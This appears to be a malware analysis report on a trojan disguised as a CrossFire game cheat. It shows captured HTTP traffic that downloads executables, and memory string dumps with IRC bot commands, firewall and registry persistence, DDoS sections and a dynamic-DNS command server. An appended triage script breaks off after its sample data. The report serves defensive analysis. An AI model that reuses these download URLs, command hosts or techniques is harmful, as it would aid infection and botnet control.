User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Thu, 16 Oct 2014 21:27:12 GMT
....
GET /winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Charset: big5, big5-hkscs, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3,
GET /tj.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: zw.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 314
Content-Type: text/html
Last-Modified: Mon, 19 May 2014 16:33:12 GMT
Accept-Ranges: bytes
ETag: "2682478073cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17048312.js"></script>..<noscript><a href="hXXp://VVV.51.la/?17048312" target="_blank"><img alt="我要啦免费统计" src="hXXp://img.users.51.la/17048312.asp" style="border:none" /></a></noscript>..
GET /y.txt?6537536855 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 189
Content-Type: text/plain
Last-Modified: Mon, 13 Oct 2014 14:52:14 GMT
Accept-Ranges: bytes
ETag: "a6f547f5e6cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
hXXp://down.tianyunxj.com/6/tqrl_90_4090.exe..hXXp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_qn2.exe..hXXp://down2.uc.cn/pcbrowser/down.php?pid=4299..hXXp://uu.cn170.com/ws.exe..........
GET /ws.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 73821
Content-Type: application/octet-stream
Last-Modified: Thu, 02 Oct 2014 03:07:13 GMT
Accept-Ranges: bytes
ETag: "ca4c18f7edddcf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:27:01 GMT
GET /tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hXXp://ya.ru/&url2=hXXp://dasf.cn/ HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: union.yoyolm.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 89
..."%local server IP%"35..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">....
GET /pcbrowser/down.php?pid=4299 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down2.uc.cn
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 16 Oct 2014 21:27:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://umcdn.uc.cn/down/4299/Browser_V3.0.1644.0_r_4299_(Build14101116).exe
0..
GET /0815/help1.html HTTP/1.0
Host: update.yoyolm.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:51 GMT
Content-Length: 538
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 07:24:49 GMT
Connection: Close
ETag: "e47ee24ffcbcf1:67c"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: MISS from cnc-sd-153-132.fcd, DISK HIT from ctl-gx-254-145.fcd
TRW2VjdF0KODY9MQo4Nz0xCjg4PTEKODk9MQo5MD0xCjkxPTEKOTI9MQo5Mz0xCjk0PTEKOTU9MQo5Nj0xCjk3PTEKOTg9MQo5OT0xCjEwMD0xCjEwMT0xCjE1MD0xCjE1MT0xCjE1Mj0xCjE1Mz0xCjE1ND0xCltnXQowPTEKW3BhXQowPTEKW2kxXQowPTEKW2kyXQowPee juiYkeWboui0rQpbaTNdCjA9aHR0cDovL3d3dy5tZWltb3R1YW4uY29tL2ljby5pY28KW2k0XQowPW1tdC5pY28KW2k1XQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS8/cmwKW3NuYW1mMV0KMD00CltzbmFtZjJdCjA9NApbc25hbV0KMD0zCltzanMzXQowPTEwCltyZWNdCjA9aHR0cDovL2RsLjM2MHNhZmUuY29tL3AvU2V0dXBfb2VtcWQ1MS5leGUKW2Rpcl0KMD1TZXR1cF9vZW1xZDUxLmV4ZQpbZHNjXQowPS9TCltlZF0KRTA9MQ==..
GET /xtsszs_qn2.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xtsszs.oss-cn-hangzhou.aliyuncs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:27:02 GMT
Content-Type: application/octet-stream
Content-Length: 842664
Connection: close
Accept-Ranges: bytes
ETag: "EB6DBA81F98D5C0DDFF2104289EA7BD3"
Last-Modified: Fri, 10 Oct 2014 07:19:34 GMT
Server: AliyunOSS
x-oss-request-id: 544038264BBECED823554E64
GET /6/tqrl_90_4090.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.tianyunxj.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:32 GMT
Content-Length: 3098224
Content-Type: application/octet-stream
Last-Modified: Sat, 13 Sep 2014 01:10:57 GMT
Connection: Keep-Alive
ETag: "6c7c992efcecf1:1823"
Content-Location: hXXp://down.tianyunxj.com/setup.exe?404;hXXp://down.tianyunxj.com:80/6/tqrl_90_4090.exe
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: DISK HIT from ctl-zj-205-074.fcd, DISK HIT from ctl-gx-254-145.fcd
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
CF黄瓜透视辅助v5.6.exe_1324:
.text
.rdata
@.data
.rsrc
t$(SSh
~%UVW
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
wininet.dll
SkinH_EL.dll
psapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://VVV.wei235.com/xixi/8.13.1.txt
hXXp://VVV.wei235.com/xbb.txt
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
%s;7*
0%x@w
%C^L:
%s T5
]E4%F(
.Funr
k%UPp
fg.VG
%C',@
>Ùd
0'.Ll
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
*.Ea]S
Q.CGo
fTpe
.LLbX
-.Mdl
\-A}=3K
Y:.akpS
$.Zcqn
u.Jck~
zx/%FN[
ce_%D
%C@0H
%s=\RI
}j%c%Y)
Rx.GR
4o#.dM
IeS`%C
[n 4\.UY
,4.qO,
gQ'.Io
%cLur?
s%DHB
]I%%X
5r.US
:mD].tB
f%fUZ
.fOuV12
*_.dC
&-N}
({?.cQm
.Cqx~c
.`.Qw
**.dU
!n]%x
%X,Cr
&.PFy{xh
.um ZZE7L
/^p%u$
I.NoQY
zu.ew
D/.nT
q.7.qE
W>^T%S
%XiR^
1%SqlnD
U[5%u
.OW74
"E.jV
c T.Om
*U%XOd
D%FW@
.gM>$slt
B.iR%
vv#%sY7x
.TY3F
kEY94
.nyBK
wN%U/
4.Ky%t
.h.fO
.TK$N
%dRB:W
[I9%f
8o%sx
.WE= T!N
#?%s(C(
Rd.hYp
.TX=6
,%x)E
R%X4C (
$7.Gs
d,.bw p
o .Kb
KOz-%c Rd
zkey0
=.Lw/Ch
!c%SGd
A.YA'
`.yV8
.qL8d0{
m>[So;.yd]
_ÎW,
%UZtQ
.Fu:#
SShXuy@
f.kz"
@o.Ns
i.IK(
9rBÀ
.nm[&
.DDU0
%f$8C
\SkinH_EL.dll
C$%cmb
.ppM|
aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
\dm.dll
!!"#$%&'())
ll%X`$Y\
%Cr#l$rQ2$d%$
.nu':
M_%UHI=
;<.dj>
Am%Xx
D
dlSQL
M CmD$L
((;|$ #(`
uF.BH:
t4u-4Z}>T
wQ.Bq
.AC:%
J.rE\j
%f; )c=
dE.Nn
TSSWPc.Th`
.xL$d
7z.tu
&%9SD
.VA`D
jY.kl
o8%dV
VGz%FrE
uù u
.BNFq{
-hO}]QV:
456789:;
!"#$%&'()* ,-./0123
deflate 1.2.3 C
en executed
p out of range,W %s
I>support g
X:
UxTheme.dll
?HttpCli
%scode,
3,%s,%d
?.PAVCExcepS,(N
' %d.
.1.2600.441~
PSAPI.DLLU%fW
88.185.3
P129.6.15.29
202.120.
\\.\%c
!
~g%s#$A
[%d]G
./*.bmp
log.tx
32778cpublic.inject.
d8 keypad
ck.ap
.=.minmax
x.cfake`!K
km.prot
hreaD%s
on.Leve
wKeyboard
Scsi%d:
1.2.24
.Fe(H;
: %s6
= (%d/
gx=%f, gy
%ld, pass G
orm.de6
O%dhx%dv qV
D=%u, "
z %4u
%ld%c$HV
-t.SSSj
MSVCRT
ntoskrnl.exQ
8)939@9|9
%cGpS
.Hs;0E
#6.BN
PI.DLLK04e
Ä!w
%c-1IY
ÈA/
Ë!b
.FLd{
%DxMr
úC~
.K.kn
.LP.,
;.0%U
n%cp,
.p.lMp
-17x3}hv
n.vg(
.os)H
-.rl2Ql
.NSx#
.QB-N
/i.Kn
.wCdn
&SÓ
2r.Qn
O,0.lmq
appingUWindowsDir
.Increm^
BkÝPtoLP
;Gw.one
ran%s
.PoDAttachnCp
.DJ-?O8
7G#V%F
(.text\
'@.tp0
{43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A} = s 'Dm'
'Dm.EXE'
val AppID = s {43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A}
dm.dmsoft = s 'dm.dmsoft'
CLSID = s '{26037A0E-7CBD-4FFF-9C63-56F2D0770214}'
CurVer = s 'dm.dmsoft'
ForceRemove {26037A0E-7CBD-4FFF-9C63-56F2D0770214} = s 'dm.dmsoft'
ProgID = s 'dm.dmsoft'
stdole2.tlbWWW
~cmdWd
KeyPress
.aKeyDownWd
MKeyUpWWWd
ShowScrMsgWW
msgWd
SetShowErrorMsgW
>SGetWindowStateWW
U@SetWindowSizeWWWd
SetWindowStateWWd
iRSetKeypadDelayWWd
BkeypadWW
SetExportDictWWWd
keyWd
FindWindowSuperW
qHKeyDownCharW
pOkey_strWd
KeyUpCharWWWd
KeyPressChard
KeyPressStrWd
EnableKeypadPatchWWWd
=PEnableKeypadSyncd
EnableRealKeypadd
GetKeyStateWd
[.ReadFiled
WaitKeyW
!key_coded
joEnumWindowSuperW
urlW
=EnableKeypadMsgWd
EnableMouseMsgWWd
method KeyPressWWW
method KeyDown
method KeyUpWW
method ShowScrMsgW
method SetShowErrorMsg
method GetWindowStateW
method SetWindowSizeWW
method SetWindowStateW
method SetKeypadDelayW
method SetExportDictWW
method FindWindowSuper
method KeyDownChar
method KeyUpCharWW
method KeyPressCharWWW
method KeyPressStr
method EnableKeypadPatchWW
method EnableKeypadSyncWWW
method EnableRealKeypadWWW
method GetKeyState
method WaitKey
method EnumWindowSuper
method EnableKeypadMsg
method EnableMouseMsgW
ADVAPI32.dll
IMM32.dll
MFC42.DLL
ole32.dll
OLEAUT32.dll
SHELL32.dll
VERSION.dll
WINMM.dll
WS2_32.dll
RegCloseKey
dm.dll
\dm.dll /s
$@wininet.dll
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
portuguese-brazilian
iphlpapi.dll
SHLWAPI.dll
MPR.dll
RASAPI32.dll
GetProcessHeap
WinExec
GetWindowsDirectoryA
GetCPInfo
KERNEL32.dll
GetKeyState
GetKeyboardLayout
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
WINSPOOL.DRV
comdlg32.dll
RegOpenKeyExA
RegCreateKeyExA
ShellExecuteA
WSOCK32.dll
WININET.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
Service Pack %d
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows ??
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98
Windows 95 OSR2
Windows 95 SP1
Windows 95
Windows CE
Windows
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows NT
%s
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
VVV.wei235.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CF
v5.6.exe
#include "l.chs\afxres.rc" // Standard components
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#
1, 0, 6, 6
3, 1227, 0, 0
(*.*)
10.1.0.0
(hXXp://VVV.eyuyan.com)
CF黄瓜透视辅助v5.6.exe_1324_rwx_006DE000_00005000:
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#
KERNEL32.DLL
CF黄瓜透视辅助v5.6.exe_1324_rwx_10001000_00039000:
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
i.exe_1172:
.text
`.rdata
@.data
.rsrc
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
ole32.dll
InternetCrackUrlA
WININET.dll
SHLWAPI.dll
.PAVCInternetException@@
360Url
IEUrl
Other%d
hXXp://VVV.wj95.com/
hXXp://uu.cn170.com/BindPlugIn.ini
%x.ini
\config.dat
Windows
1, 0, 0, 2
PostInstall.EXE
DL.exe_1984:
.text
`.data
.rsrc
MSVBVM60.DLL
#vb6chs.dll
1111111
ieframe.dll
SHDocVwCtl.WebBrowser
WebBrowser
E:\VB
\VB6.OLB
C:\Windows\SysWOW64\ieframe.oca
VBA6.DLL
.dwd8
L(.kc
hXXp://uu.cn170.com/y.txt
hXXp://zw.cn170.com/tj.html
1.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
%Documents and Settings%\All Users\
Scripting.FileSystemObject
WScript.Shell
1111111.exe
DL.exe_1984_rwx_00408000_00005000:
.dwd8
L(.kc
ignite.exe_432:
.text
`.data
.rsrc
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
%System%\mshtml.tlb
%Program Files%\VB
\VB6.OLB
0%System%\shdocvw.oca
winmm.dll
time.dll
advapi32.dll
RegCloseKey
GetUrlSource
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
VBA6.DLL
%System%\msvbvm60.dll\3
Password
WebBrowser2
WebBrowser1
)o4.tr
sUrl
sSrvCmd
sSrvPassword
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
\time.dll
\weathers.exe
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh3/
hXXp://mini.yoyolm.net/new/
\setings.ini
hXXp://mini.yoyolm.net/ta1/?flag=
(C) hXXp://VVV.tqshopping.com/
manual.exe
ignite.exe_432_rwx_012F1000_00018000:
%SQVW
<.tbwij>
<.tc>
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke
mankind.exe_528:
.text
`.data
.rsrc
GDIPLUS.DLL
gdi32.dll
kernel32.dll
NTDLL.DLL
user32.dll
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
.aicAlphaImage
.ucListBox
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
2014-03-08
.ucShadow
" id="W5M0MpCehiHzreSzNTczkc9d"?>
2014/01/15
#vb6chs.dll
.OsenXPComboBox
.CommandButton
.LbDate
.OsenXPDTPicker
.OsenXPSpin
shdocvw.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
#Web1
0%System%\shdocvw.oca
%System%\mshtml.tlb
URLEncode1
time.dll
wininet.dll
InternetOpenUrlA
comctl32.dll
winmm.dll
%System%\msvbvm60.dll\3
WriteIniKey
GetIniKey
DelIniKey
advapi32.dll
RegCloseKey
RegOpenKeyA
Replace.dll
Password
GetAsyncKeyState
SetWindowsHookExA
UnhookWindowsHookEx
VBA6.DLL
msvbvm60.dll
olepro32.dll
msimg32.dll
shell32.dll
F%System%\stdole2.tlb
GdiplusShutdown
gdiplus.dll
zlib.dll
zlib1.dll
__vbaStopExe
KeyDown
KeyPress
KeyUp
cmdBrowse
cmdClipBoard
comdlg32.dll
AddMsg
DelMsg
\ctl\WinSubHook.tlb
IsSysShadowEnabled
GetProcessHeap
SetMsgHook
SetMsgUnHook
ole32.dll
==?==?==?==?==?
==?==?==?
2003/07/13
strURL
strKey
KeyWord
uMsg
sSrvCmd
sSrvPassword
KeyCode
KeyAscii
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Return whether the OS supports layered windows.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether we're running under Windows XP.
Returns a handle (from Microsoft Windows) to an object's window.
Returns the number of items in the list portion of a control.
Occurs when the user presses and releases an ANSI key.
Qh$%C
Rh0%C
PhT%C
Qhd%C
Qh0%C
FTPj
\tclock.ini
tray_yes.png
tray_no.png
\time.dll
Software\Microsoft\Windows\CurrentVersion\run
.exe" /t
hXXp://VVV.weather.com.cn/weather/
.shtml
cmd.exe /c taskkill /im
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
huangli.xml
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
1.png
setting.ini
ddd.png
\Replace.dll
\Replace64.dll
\uTray.exe
city.txt
toolbar_hover (3).png
2.png
3.png
button_p_pushed.png
button_p_hover.png
00:00:00
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=
\Weather_none.png
18:00:00
08:00:00
Refresh_pushed.png
Refresh_normal.png
Refresh_hover.png
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}
.cb_Callback
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*.bmp
*.gif
*.ico;*.cur
*.jpg;*.jpeg
*.wmf;*.emf
*.png
Windows Meta File
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
\uCalendar\db2.mdb;Persist Security Info=False
Msxml2.XMLHTTP.3.0
application/x-www-form-urlencoded
\uTray.exe"
0000000
DragFullWindows
0123456789
\uCalendar\input.png
\uCalendar\button_3a.png
\uCalendar\button_3b.png
\uCalendar\tip.png
\uCalendar\NewIcons007.png
\uCalendar\button_state5.png
\uCalendar\setting.ini
(C) hXXp://VVV.tqshopping.com/
weathers.exe
mankind.exe_528_rwx_01C61000_00018000:
%SQVW
<.tbwij>
<.tc>
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke
svhost.exe_628:
.Buffer
`.Ddos
`.text
.Breakth
`.Socket
`.SocketB
`.Attack
`.rdata
@.data
.rsrc
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
MSVCRT.dll
_acmdln
WS2_32.dll
WINMM.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
t Explorer\iexplore.exe
#0%s!
%s/%s
GET %s?=%d HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
Host: %s
GET / HTTP/1.1
Host: %s:%d
GET %s HTTP/1.1
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Host: %sContent-Type: text/html
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01;Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
Referer: hXXp://%s
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
%d.%d.%d.%d
192.168.1.244
chinaljndk.3322.org:9999
994175033994175033
InternetOpenUrlA
hra%u.dll
%d.exe
SOFTWARE.LOG
kernel32.dll
ddd
dwNumEntries = %u
.rdata
@.reloc
SHELL32.dll
SHLWAPI.dll
lpk.addon
lpk.dll
7"7'737?7
v.qju
.gc[_
svhost.exe_628_rwx_00413000_00005000:
v.qju
.gc[_
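Added example, not part of the Lavasoft report or its tooling: a Python triage script that reads "Strings from Dumps" blocks in the form the report renders them (a `name_pid[_rwx_base_size]:` header followed by one string per line), drops the duplicated lines, re-fangs the `hXXp://` and `VVV.` obfuscation so the IOCs match real traffic, and tags the strings that carry the verdict in this sample: the IRC bot strings (`NICK`, `JOIN`, Qooirc.zief.pl, proxim.ircgalaxy.pl), the hosts-file entry `127.0.0.1 ZieF.pl`, the `%s:*:enabled:@shell32.dll,-1` value format that Windows Firewall uses under `AuthorizedApplications\List`, the `CurrentVersion\run` persistence path, the `.Ddos`/`.Attack` section names and spoofed Baiduspider User-Agent in svhost.exe, and the dynamic-DNS C2 `chinaljndk.3322.org:9999`. The embedded input is a constructed excerpt of the dumps above (the second header name is a placeholder); the TLD allowlist and the tag patterns are the author's own assumptions, not something the report states.

```python
"""Offline triage of a Lavasoft MAS "Strings from Dumps" section (added example)."""
import re

# Constructed excerpt of the report's dump blocks, every string duplicated the
# way the report renders it. The second header name is a placeholder.
SAMPLE_DUMP = r"""svhost.exe_628:
`.Ddos
`.Ddos
`.Attack
`.Attack
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
chinaljndk.3322.org:9999
chinaljndk.3322.org:9999
sample.exe_1324_rwx_006DE000_00005000:
%s:*:enabled:@shell32.dll,-1
%s:*:enabled:@shell32.dll,-1
Qooirc.zief.pl
Qooirc.zief.pl
NICK wxbxymrj
NICK wxbxymrj
127.0.0.1 ZieF.pl
127.0.0.1 ZieF.pl
hXXp://VVV.wei235.com/xbb.txt
hXXp://VVV.wei235.com/xbb.txt
Software\Microsoft\Windows\CurrentVersion\run
Software\Microsoft\Windows\CurrentVersion\run
wininet.dll
wininet.dll
"""

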